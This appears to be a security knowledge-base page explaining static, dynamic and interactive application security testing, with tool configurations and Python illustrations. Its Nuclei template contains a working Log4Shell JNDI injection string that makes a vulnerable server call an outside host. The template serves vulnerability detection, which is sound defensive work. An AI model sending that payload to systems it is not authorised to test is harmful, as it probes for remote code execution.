---
id: wiki-2026-0508-static-and-dynamic-analysis
title: Static and Dynamic Analysis
category: 10_Wiki/Topics
status: verified
canonical_id: self
aliases: [SAST, DAST, Code Analysis, Program Analysis]
duplicate_of: none
source_trust_level: A
confidence_score: 0.9
verification_status: applied
tags: [security, analysis, sast, dast]
raw_sources: []
last_reinforced: 2026-05-10
github_commit: pending
tech_stack:
  language: multi
  framework: semgrep-zap
---

# Static and Dynamic Analysis

## One-liner

> **"SAST reads the code; DAST runs the code."** Static analysis inspects the source or binary; dynamic analysis probes the running application. The 2026 best practice is a layered defense of SAST + DAST + IAST.

## Key points

### SAST (Static Application Security Testing)

- Analyzes source code or bytecode without executing it.
- Strengths: full coverage, early in the SDLC, finds bugs that are hard to trigger at runtime.
- Weaknesses: false positives, no runtime context, framework-specific false negatives.
- Tools: Semgrep, CodeQL, SonarQube, Snyk Code.

### DAST (Dynamic Application Security Testing)

- Black-box probing of the running application, for example HTTP fuzzing.
- Strengths: observes real runtime behavior, catches environment and configuration bugs, low false-positive rate.
- Weaknesses: limited coverage (only reachable paths), late in the SDLC.
- Tools: OWASP ZAP, Burp Suite, Nuclei.

### IAST (Interactive Application Security Testing)

- An instrumented agent tracks data flow inside the running application.
- Hybrid: static-style precision with dynamic-style validity.
- Tools: Contrast Security, Checkmarx IAST.

### Applications

1. CI/CD security gate (SAST on every PR).
2. Pre-prod scan (DAST against staging).
3. Compliance (PCI, SOC 2, ISO 27001).
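To make the SAST strengths and weaknesses above concrete, here is an added example (not code from this wiki or from any of the tools it names): a deliberately small, intraprocedural taint tracker over Python's `ast` module. It implements the source / sanitizer / sink rule the page describes, and three constructed snippets show a true positive, a sanitized (safe) flow, and a false positive caused by a custom sanitizer the rule does not know about. The source, sink and sanitizer names (`request.args.get`, `render_html`, `html.escape`) are assumptions chosen for the snippets.

```python
"""Minimal intraprocedural taint tracker (added example, not from the page).

Rule: a value that originates at a SOURCE and reaches a SINK without passing
through a SANITIZER is reported. Unknown calls are assumed to propagate taint,
which is the conservative choice that buys coverage at the cost of false positives.
"""
import ast
from dataclasses import dataclass
from typing import Optional

# Hypothetical names, chosen to match the constructed snippets below.
SOURCES = {"request.args.get"}   # attacker-controlled input
SINKS = {"render_html"}          # writes HTML into the response
SANITIZERS = {"html.escape"}     # neutralises the taint

# Constructed target snippets (not real application code).
VULNERABLE = """
def handler(request):
    q = request.args.get("q")
    title = "Results for " + q
    render_html(title)
"""

SAFE = """
import html
def handler(request):
    q = request.args.get("q")
    clean = html.escape(q)
    render_html("Results for " + clean)
"""

# A custom wrapper around the sanitizer is opaque to the rule: reported anyway.
FALSE_POSITIVE = """
import html
def my_escape(x):
    return html.escape(x)
def handler(request):
    q = request.args.get("q")
    render_html(my_escape(q))
"""


@dataclass(frozen=True)
class Finding:
    sink: str
    line: int
    source: str


def call_name(node: ast.Call) -> str:
    """Return the dotted callee name, e.g. 'request.args.get'."""
    parts = []
    f = node.func
    while isinstance(f, ast.Attribute):
        parts.append(f.attr)
        f = f.value
    if isinstance(f, ast.Name):
        parts.append(f.id)
    return ".".join(reversed(parts))


class TaintVisitor(ast.NodeVisitor):
    def __init__(self) -> None:
        self.tainted: dict = {}          # variable name -> originating source
        self.findings: list = []

    def taint_of(self, expr: ast.AST) -> Optional[str]:
        """Return the source name if expr carries taint, else None."""
        if isinstance(expr, ast.Call):
            name = call_name(expr)
            if name in SOURCES:
                return name
            if name in SANITIZERS:
                return None              # a known sanitizer kills the taint
            for arg in expr.args:        # unknown call: taint flows through its args
                t = self.taint_of(arg)
                if t:
                    return t
            return None
        if isinstance(expr, ast.Name):
            return self.tainted.get(expr.id)
        if isinstance(expr, ast.BinOp):  # string concatenation propagates taint
            return self.taint_of(expr.left) or self.taint_of(expr.right)
        return None                      # literals and anything else are clean

    def visit_Assign(self, node: ast.Assign) -> None:
        t = self.taint_of(node.value)
        for target in node.targets:
            if isinstance(target, ast.Name):
                if t:
                    self.tainted[target.id] = t
                else:
                    self.tainted.pop(target.id, None)
        self.generic_visit(node)

    def visit_Call(self, node: ast.Call) -> None:
        if call_name(node) in SINKS:
            for arg in node.args:
                t = self.taint_of(arg)
                if t:
                    self.findings.append(Finding(call_name(node), node.lineno, t))
        self.generic_visit(node)


def analyze(src: str) -> list:
    """Run the tracker over one module's source and return its findings."""
    v = TaintVisitor()
    v.visit(ast.parse(src))
    return v.findings


if __name__ == "__main__":
    for label, snippet in (("vulnerable", VULNERABLE), ("safe", SAFE),
                           ("false positive", FALSE_POSITIVE)):
        print(label, analyze(snippet))
```

The third snippet is the page's "false positives" weakness in miniature: a real tool fixes it with interprocedural analysis or a sanitizer annotation, both of which cost precision elsewhere. The tracker is also intraprocedural and flow-insensitive, so taint carried through a helper's return value or a branch is exactly where its false negatives live.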
## 💻 Patterns

### Semgrep — custom SAST rule

```yaml
rules:
  - id: hardcoded-jwt-secret
    # "..." matches any string literal (a hardcoded secret); the trailing ...
    # also matches calls that pass a third options argument.
    pattern: jwt.sign($PAYLOAD, "...", ...)
    message: Hardcoded JWT secret detected
    severity: ERROR
    languages: [javascript, typescript]
```

### CodeQL — taint tracking

```ql
/**
 * @name DOM XSS via innerHTML
 * @kind path-problem
 */
import javascript
import DataFlow::PathGraph

class XssConfig extends TaintTracking::Configuration {
  XssConfig() { this = "Xss" }

  override predicate isSource(DataFlow::Node n) { n instanceof RemoteFlowSource }

  // innerHTML is a property, not a method: the sink is the right-hand side
  // of a property write such as `el.innerHTML = value`.
  override predicate isSink(DataFlow::Node n) {
    exists(DataFlow::PropWrite pw |
      pw.getPropertyName() = "innerHTML" and n = pw.getRhs()
    )
  }
}

from XssConfig cfg, DataFlow::PathNode source, DataFlow::PathNode sink
where cfg.hasFlowPath(source, sink)
select sink.getNode(), source, sink, "Untrusted input flows to innerHTML."
```

### ZAP — automated DAST scan

```bash
docker run -v "$(pwd)":/zap/wrk:rw -t zaproxy/zap-stable \
  zap-baseline.py -t https://staging.example.com \
  -r report.html -J report.json
```

### Nuclei — template-based DAST

```yaml
id: log4shell
info:
  name: Apache Log4j RCE
  severity: critical
requests:
  - method: GET
    path: ["{{BaseURL}}"]
    headers:
      User-Agent: "${jndi:ldap://{{interactsh-url}}/a}"
    matchers:
      - type: word
        part: interactsh_protocol
        words: ["dns"]
```

### CI integration — GitHub Actions

```yaml
steps:
  - uses: actions/checkout@v4
  - uses: returntocorp/semgrep-action@v1
    with:
      config: p/owasp-top-ten
  # CodeQL needs an init step (language selection, database creation) before analyze.
  - uses: github/codeql-action/init@v3
    with:
      languages: javascript
  - uses: github/codeql-action/analyze@v3
  - name: ZAP Baseline
    uses: zaproxy/action-baseline@v0.10.0
    with:
      target: 'https://staging.example.com'
```

### Tainted data flow — Java pseudocode

```java
import java.io.IOException;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.apache.commons.text.StringEscapeUtils;   // Apache Commons Text

void handle(HttpServletRequest request, HttpServletResponse response) throws IOException {
    String input = request.getParameter("q");                 // SOURCE (tainted)
    String sanitized = StringEscapeUtils.escapeHtml4(input);  // SANITIZER
    response.getWriter().write(sanitized);                    // SINK (safe)
    // SAST tracks: source → sink without sanitizer = vulnerability
}
```

### SBOM + dependency scanning

```bash
syft dir:. \
  -o cyclonedx-json > sbom.json
grype sbom:sbom.json --fail-on high
```

## Decision criteria

| Situation | Approach |
|---|---|
| Pre-commit, fast feedback | SAST (Semgrep) |
| Deep semantic analysis | CodeQL |
| Pre-prod runtime check | DAST (ZAP, Burp) |
| Runtime + coverage | IAST (Contrast) |
| Dependency vulns | SCA (Snyk, Grype) |

**Default**: Semgrep (PR) + ZAP baseline (nightly) + Grype (deps).

## 🔗 Graph

- Parent: [[Application Security]] · [[CI_CD 파이프라인 및 IDE 통합 보안|DevSecOps]]
- Variants: [[SAST]] · [[보안_및_시스템_신뢰성_표준|DAST]] · [[IAST]] · [[SCA_Fundamentals|SCA]]
- Adjacent: [[Fuzzing]] · [[Threat Modeling]] · [[보안_및_시스템_신뢰성_표준|OWASP Top 10]]

## 🤖 LLM usage

**When**: code review automation, custom rule generation, false-positive triage.
**When not**: full code understanding (LLMs hallucinate), security-critical decisions without human review.

## ❌ Anti-patterns

- **SAST only**: misses runtime configuration bugs; add DAST.
- **Ignore false positives**: causes alert fatigue; invest in rule tuning.
- **Scan in prod**: run DAST against staging, never against production.
- **One-time scan**: make it continuous; gate every PR.

## 🧪 Verification / duplicates

- Verified (OWASP Testing Guide v5, NIST SP 800-218).
- Trust level A.

## 🕓 Changelog

| Date | Change |
|---|---|
| 2026-05-08 | Phase 1 |
| 2026-05-10 | Manual cleanup — SAST/DAST/IAST patterns, CI integration |
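The ZAP baseline pattern and the "SAST only" anti-pattern both hinge on the same point: a missing security header is a runtime configuration bug that no amount of source reading finds. The following added example (written for this page, not ZAP's code) reproduces the passive part of a baseline scan in miniature. It starts two constructed instances of the same tiny app on localhost, one without and one with the headers, fetches each, and reports which expected headers are absent. The app, the header set and the function names are all assumptions; a real scan would target staging, as the decision table says, never production.

```python
"""Minimal passive DAST header check (added example; not ZAP's code).

Two constructed handlers stand in for the unhardened and hardened builds of
the same application. Nothing here is fuzzing: like a baseline scan, it only
observes responses and flags configuration gaps the source code cannot show.
"""
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import urlopen

# Headers a passive baseline check expects on every HTML response
# (assumed set for this example; real scanners have a longer list).
EXPECTED_HEADERS = [
    "Content-Security-Policy",
    "X-Content-Type-Options",
    "X-Frame-Options",
]

# Constructed hardened configuration for the second instance.
HARDENED = {
    "Content-Security-Policy": "default-src 'self'",
    "X-Content-Type-Options": "nosniff",
    "X-Frame-Options": "DENY",
}


def make_handler(extra_headers: dict):
    """Build a request handler that serves one page plus the given headers."""
    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            body = b"<html><body>hello</body></html>"
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            for name, value in extra_headers.items():
                self.send_header(name, value)
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

        def log_message(self, *args):  # keep the scan output quiet
            pass
    return Handler


def serve(handler_cls):
    """Start the app on an ephemeral localhost port; return (server, base_url)."""
    srv = HTTPServer(("127.0.0.1", 0), handler_cls)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}"


def baseline_scan(base_url: str, paths=("/",)) -> dict:
    """Fetch each path and return {path: [missing header names]}."""
    report = {}
    for path in paths:
        with urlopen(base_url + path, timeout=5) as resp:
            present = {k.lower() for k in resp.headers.keys()}
        report[path] = [h for h in EXPECTED_HEADERS if h.lower() not in present]
    return report


def scan_both() -> dict:
    """Scan an unhardened and a hardened instance of the same app."""
    results = {}
    for label, headers in (("unhardened", {}), ("hardened", HARDENED)):
        srv, url = serve(make_handler(headers))
        try:
            results[label] = baseline_scan(url)
        finally:
            srv.shutdown()
            srv.server_close()
    return results


if __name__ == "__main__":
    for label, report in scan_both().items():
        print(label, report)
```

Header names are compared case-insensitively because HTTP header names are; a check that forgets this reports a false positive on servers that emit lower-case names. The same scan against the hardened instance returns an empty list, which is the regression signal a nightly baseline job keys on.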
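The default stack (Semgrep on PRs, ZAP baseline nightly, Grype on dependencies) only becomes a gate once the three reports are read against one policy. This added example (not from the page or from any of the three tools) normalises constructed Semgrep, ZAP and Grype JSON into one finding list and fails the build at a chosen severity. The field names follow the tools' JSON reports as understood by the example's author (Semgrep `results[].extra.severity`, ZAP `site[].alerts[].riskcode`, Grype `matches[].vulnerability.severity`) and are assumptions; the severity mappings are a policy choice, and the CVE identifier is a placeholder.

```python
"""Severity gate across SAST, DAST and SCA reports (added example).

The three report samples are constructed; field layouts are assumed to match
each tool's JSON output and should be checked against the tool version in use.
"""
import json

SEMGREP_REPORT = json.dumps({"results": [
    {"check_id": "hardcoded-jwt-secret", "path": "src/auth.js",
     "start": {"line": 12},
     "extra": {"severity": "ERROR", "message": "Hardcoded JWT secret detected"}},
    {"check_id": "console-log", "path": "src/app.js",
     "start": {"line": 3},
     "extra": {"severity": "INFO", "message": "console.log left in code"}},
]})

ZAP_REPORT = json.dumps({"site": [{"@name": "https://staging.example.com", "alerts": [
    {"alert": "Content Security Policy (CSP) Header Not Set", "riskcode": "2"},
    {"alert": "X-Content-Type-Options Header Missing", "riskcode": "1"},
]}]})

GRYPE_REPORT = json.dumps({"matches": [
    {"vulnerability": {"id": "CVE-PLACEHOLDER-1", "severity": "High"},   # placeholder id
     "artifact": {"name": "examplelib", "version": "1.2.3"}},
]})

# One ordinal scale for all tools; the mappings below are this gate's policy.
LEVELS = {"info": 0, "low": 1, "medium": 2, "high": 3, "critical": 4}
SEMGREP_SEVERITY = {"INFO": "info", "WARNING": "medium", "ERROR": "high"}
ZAP_RISKCODE = {"0": "info", "1": "low", "2": "medium", "3": "high"}


def normalize(semgrep_json: str, zap_json: str, grype_json: str) -> list:
    """Flatten the three reports into dicts with tool, severity, where, what."""
    findings = []
    for r in json.loads(semgrep_json)["results"]:
        findings.append({
            "tool": "semgrep",
            "severity": SEMGREP_SEVERITY[r["extra"]["severity"]],
            "where": f'{r["path"]}:{r["start"]["line"]}',
            "what": r["check_id"],
        })
    for site in json.loads(zap_json)["site"]:
        for a in site["alerts"]:
            findings.append({
                "tool": "zap",
                "severity": ZAP_RISKCODE[a["riskcode"]],
                "where": site["@name"],
                "what": a["alert"],
            })
    for m in json.loads(grype_json)["matches"]:
        findings.append({
            "tool": "grype",
            "severity": m["vulnerability"]["severity"].lower(),
            "where": f'{m["artifact"]["name"]}@{m["artifact"]["version"]}',
            "what": m["vulnerability"]["id"],
        })
    return findings


def gate(findings: list, threshold: str = "high"):
    """Return (passed, blocking_findings) for findings at or above threshold."""
    blocking = [f for f in findings if LEVELS[f["severity"]] >= LEVELS[threshold]]
    return len(blocking) == 0, blocking


if __name__ == "__main__":
    passed, blocking = gate(normalize(SEMGREP_REPORT, ZAP_REPORT, GRYPE_REPORT))
    for f in blocking:
        print(f'{f["tool"]:8} {f["severity"]:8} {f["where"]}  {f["what"]}')
    raise SystemExit(0 if passed else 1)
```

Keeping the threshold per stage (for example `high` on a PR, `medium` nightly) is what stops the "ignore false positives" anti-pattern: low-severity DAST noise never blocks a merge, so the alerts that do block stay credible.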